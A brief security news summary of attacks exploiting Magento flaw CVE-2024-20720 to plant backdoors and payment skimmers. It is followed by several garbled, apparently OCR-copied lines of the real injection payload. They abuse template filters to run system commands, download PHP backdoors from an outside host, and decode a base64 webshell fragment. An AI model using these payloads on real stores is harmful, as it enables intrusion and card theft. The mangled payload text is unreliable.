Hackers are exploiting a critical vulnerability in Magento, a popular e-commerce platform, to inject a persistent backdoor into websites. This flaw, identified as CVE-2024-20720, allows attackers to execute arbitrary code by manipulating the Magento layout parser and leveraging a default package. The backdoor facilitates the installation of a payment skimmer that steals financial data, which is then exfiltrated to another compromised site. Adobe addressed the issue in a security update in February 2024.
For more details, you can read the full article here.
{{var this.getTemp%00lateFilter().filter(firstname)}} {{var this.getTemp%00lateFilter().add%00AfterFilterCallback(system).Filter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS
Tivar this.getTemp%00lateFilter(.fiTter(firstname)!] (fvar this.getTemp%00lateFilter().add%00AfterFilterCallback(system). Filter(cd$(IFS%??}pub;curI$ (IFS%??)o${IFS%??]cache.php$(IFS%??}http://magdemo.io/cache.php?m=16235-40010-41504)})
(var this.getTemp%00lateFilter().filter(firstname)!} ({var this.getTemp%00lateFilter().add%00AfterFifter Callback(system).Filter(cd${IFS%??}pub;curI${IFS%??)
o$(IFS%??}health_check.php$(IFS%??}http://magdemo.io/cache.php?m=29812-32433-18890}}(tvar this.getTemp%00lateFilter().filter(firstname)}} (fvarthis.getTemp%00lateFilter().add%00AfterFilterCallback(base64_decode).add%00AfterFilterCallback(system).Filter(Y2QgcHViO2VjaG8g/zw/cGhw|GImKCRfUE9TVFsncCddPTOibFpFV3VDY1MiKSAKX1BP